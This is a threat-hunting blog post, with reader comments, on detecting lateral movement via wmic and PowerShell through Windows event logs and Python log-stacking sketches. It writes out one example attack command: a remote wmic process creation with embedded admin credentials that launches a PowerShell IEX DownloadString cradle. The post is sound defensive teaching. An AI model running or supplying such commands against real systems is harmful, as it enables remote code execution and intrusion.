Wednesday, August 24, 2016

Hunting From The Top

A few years ago David Bianco produced the Pyramid of Pain as a way to measure the cost imposed on an adversary when you detect different types of IOCs. I think it is a great way to measure your detection: look across all of your signatures and identify where each one sits on the pyramid. If the majority are at the bottom, an adversary only needs to change a few simple things and you completely lose sight of them. The same can be said for hunting. A few days ago I talked about the need to think about behaviors and the artifacts those behaviors create. I think this is a very important concept and something that can help you begin to hunt from the top of the pyramid.

We know that during targeted attacks an adversary will typically need to move laterally in order to access the data they are after. If we hypothesize about the different ways an adversary will move from machine to machine, we can begin to build out the questions we need to ask. To illustrate, let's say we hypothesize that an adversary will take advantage of wmic and powershell to facilitate lateral movement through our network. Both have been widely reported, so it makes sense to try to identify anomalous use of these tools. When planning our strategy we first need to understand how these tools are being used so that we can mimic the behavior in a test environment.

Consider the following command:
wmic /node: /user:"pwned\administrator" /password:"abc123" process call create "powershell.exe -Command add-content -path 'C:\bad.ps1' { IEX (New-Object Net.WebClient).DownloadString('' )}"

If I were to review the Windows Security event log on the source machine, I would see that executing the command generated a 4648 logon event with wmic.exe as the source process. Following this I would want to see how prevalent this is in my environment. Try to answer the following questions:
  1. Do admins typically execute wmic against remote machines?   
  2. What user accounts are typically seen in legitimate activity?
  3. When they authenticate, are they authenticating as the same user or as a different user to run the command?
  4. Did the source attempt to authenticate to a single machine or to multiple machines with the same user account?
  5. What are the roles of these machines? 
  6. Can I tune out normal activity based on the answers to the above as well as recurring volume?
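
As a rough sketch of how questions 3 and 4 could be asked of the data, assume the 4648 events have already been exported and parsed into Python dictionaries. The field names (src_host, src_user, dest_host, dest_user, process), the helper names and the sample records are all made up for illustration and are not a real log schema.

```python
from collections import defaultdict

# Hypothetical, already-parsed 4648 records. Field names are assumptions.
sample_4648 = [
    {"src_host": "ws01", "src_user": r"pwned\alice", "dest_host": "srv01",
     "dest_user": r"pwned\administrator", "process": r"C:\Windows\System32\wbem\WMIC.exe"},
    {"src_host": "ws01", "src_user": r"pwned\alice", "dest_host": "srv02",
     "dest_user": r"pwned\administrator", "process": r"C:\Windows\System32\wbem\WMIC.exe"},
    {"src_host": "admin01", "src_user": r"pwned\bob", "dest_host": "srv01",
     "dest_user": r"pwned\bob", "process": r"C:\Windows\System32\wbem\WMIC.exe"},
    {"src_host": "ws02", "src_user": r"pwned\carol", "dest_host": "ws02",
     "dest_user": r"pwned\carol", "process": r"C:\Windows\System32\runas.exe"},
]


def wmic_fan_out(events, process_name="wmic.exe"):
    """Map (source host, account used) to the set of hosts it was used against."""
    targets = defaultdict(set)
    for ev in events:
        if ev["process"].lower().endswith(process_name):
            targets[(ev["src_host"], ev["dest_user"])].add(ev["dest_host"])
    return targets


def multi_target(events, min_hosts=2):
    """Question 4: sources that used one account against several machines."""
    return {key: sorted(hosts)
            for key, hosts in wmic_fan_out(events).items()
            if len(hosts) >= min_hosts}


def different_account(events):
    """Question 3: logons where the supplied account differs from the logged-on user."""
    return [ev for ev in events
            if ev["src_user"].lower() != ev["dest_user"].lower()]


print(multi_target(sample_4648))
print(len(different_account(sample_4648)))
```

Whatever falls out of these two filters still has to be weighed against questions 1, 2 and 5 before it means anything.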

On the destination side, the Windows Security event log would show a 4624 type 3 logon as well as a 4688 event where wmiprvse.exe is the parent process of powershell.exe. When powershell downloaded bad.ps1, I would also see an HTTP GET request with no User-Agent string. Some questions to ask may be:
  1. Does wmic normally spawn powershell in my environment?
  2. If this typically occurs, can I whitelist based off of known usernames and hostnames?
  3. For anomalies, what are the roles of the machines?
  4. What other child processes does powershell have when wmiprvse is its parent?
  5. How often is a .ps1 file fetched from the internet with no User-Agent?
  6. What are other files being downloaded with no User-Agent?
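
A minimal sketch of the destination-side questions, again assuming the 4688 process events and the web proxy logs have already been parsed into dictionaries. The field names (host, parent, process, src, url, user_agent), the helper names and the sample records are hypothetical, and whether your 4688 events carry the parent process name at all depends on how your endpoints are configured.

```python
from collections import Counter
import ntpath

# Hypothetical parsed 4688 records. Field names are assumptions.
sample_4688 = [
    {"host": "srv01", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"host": "srv02", "parent": r"C:\Windows\explorer.exe",
     "process": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"},
    {"host": "srv03", "parent": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "process": r"C:\Windows\System32\cmd.exe"},
]

# Hypothetical parsed proxy records. Field names are assumptions.
sample_http = [
    {"src": "srv01", "url": "http://example.invalid/a.ps1", "user_agent": ""},
    {"src": "ws09", "url": "http://example.invalid/index.html", "user_agent": "Mozilla/5.0"},
    {"src": "srv04", "url": "http://example.invalid/b.bin", "user_agent": None},
]


def image_name(path):
    """Lower-cased file name of a Windows path, regardless of the OS running this."""
    return ntpath.basename(path).lower()


def children_of(events, parent="wmiprvse.exe"):
    """Stack the processes spawned by the given parent."""
    return Counter(image_name(ev["process"])
                   for ev in events
                   if image_name(ev["parent"]) == parent)


def no_user_agent(requests):
    """Requests whose User-Agent is missing or empty."""
    return [r for r in requests if not r.get("user_agent")]


def ps1_without_user_agent(requests):
    """Subset of the above fetching a .ps1 (simple suffix match, ignores query strings)."""
    return [r for r in no_user_agent(requests)
            if r["url"].lower().endswith(".ps1")]


print(children_of(sample_4688))
print([r["url"] for r in no_user_agent(sample_http)])
print([r["url"] for r in ps1_without_user_agent(sample_http)])
```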

When reviewing the data it also helps to include only the fields that are pertinent to what you are looking for. It's much easier to find anomalous activity when you have only relevant data in front of you. Here are some views that I find helpful when looking at 4648 events:
  1. processes that were used to initiate a 4648 logon event. Stack the process name by count and focus on low counts.
  2. src user != dest user stack by count
  3. src user = dest user stack by count
  4. src host and dest host stack by count 
  5. src user != dest user and  src host != dest host count by dest host
  6. src user != dest user and  src host != dest host sort by time
  7. time, src host, src user, dest host, dest user, anomalous process
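
To make "stack by count" concrete, here is a small sketch of a few of the views above. It assumes the 4648 events are already parsed into dictionaries; the field names, the `stack` helper and the sample records are hypothetical and only there to show the idea.

```python
from collections import Counter

# Hypothetical parsed 4648 records. Field names are assumptions.
sample_events = [
    {"process": "svchost.exe", "src_host": "ws01", "src_user": "alice",
     "dest_host": "fs01", "dest_user": "alice"},
    {"process": "svchost.exe", "src_host": "ws02", "src_user": "bob",
     "dest_host": "fs01", "dest_user": "bob"},
    {"process": "svchost.exe", "src_host": "ws01", "src_user": "alice",
     "dest_host": "fs01", "dest_user": "alice"},
    {"process": "wmic.exe", "src_host": "ws01", "src_user": "alice",
     "dest_host": "srv01", "dest_user": "administrator"},
]


def stack(events, *fields, where=None):
    """Count each distinct combination of fields, rarest first."""
    rows = (ev for ev in events if where is None or where(ev))
    counts = Counter(tuple(ev[f] for f in fields) for ev in rows)
    # Sort by count ascending so the low counts are at the top.
    return sorted(counts.items(), key=lambda item: (item[1], item[0]))


# View 1: process names by count, low counts first.
for key, count in stack(sample_events, "process"):
    print(count, *key)

# View 2: only events where src user != dest user.
differs = stack(sample_events, "src_user", "dest_user",
                where=lambda ev: ev["src_user"] != ev["dest_user"])
print(differs)

# View 4: src host and dest host pairs by count.
print(stack(sample_events, "src_host", "dest_host"))
```

The same helper covers the other views by changing the fields and the filter. Sorting by time (view 6) needs a timestamp field, which these sample records leave out.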

To sum things up, I think the following steps are important to building any new hunt: hypothesize, understand the behavior, formulate questions, test the data, build queries, and automate the collection and presentation of data. As always, I would love to hear any questions or feedback. You can also find me on Twitter @jackcr.


  1. Jack,

    Great post, but as an incident responder, I rarely see clients who have their endpoints instrumented to collect process information.

    Also, I've seen cases where we have instrumented the client's endpoints, and found that the admins were doing things as part of remediation that were similar to (albeit not exactly like) what the bad guys were doing. ;-)

  2. Yeah, unfortunately this is a sport where you are limited by the data you collect. If anything, I hope that people understand the data they have and how to ask the right questions of it to find anomalies that may indicate attacker activity.

    1. I preach instrumentation and visibility pretty religiously. You can't say that something did or didn't happen if you don't have the ability to determine it either way, let alone "see" or record it. There have been many times when I've gone back to a client and said, "...we cannot answer that question definitively", and when asked what we would have needed, very often the answer is process creation data.

      There have been a number of us who have been extolling the virtues of instrumentation for years, illustrating the value over and over again. Bad guy RAR'd up your data and added a password? No problem...*if* you captured the full command line. You go from a "Naval Academy salute" to full disclosure in seconds.

    2. As a consultant you have the opportunity to work with many different companies. Do you find that after a major intrusion these companies make big spends in visibility and people?

  3. Worse, the SIEM in the enterprise often only collects logs from the servers and not from the endpoints. Thus, only half of the story is told.

  4. Jack, what do you mean by stack by count? Would you be able to provide an example? I have been following your blog and using it to build capability within our environment. Thanks for putting this blog together.

  5. Basically placing the process name in one column, the number of times that process occurred in a 4648 logon event in a second column and ordering by that number of times.

    You could also add things like usernames and machine names in additional columns and order in different ways to find anomalies. The dataset may get very large, but it also may give you a different perspective of machines that are communicating and how they are communicating.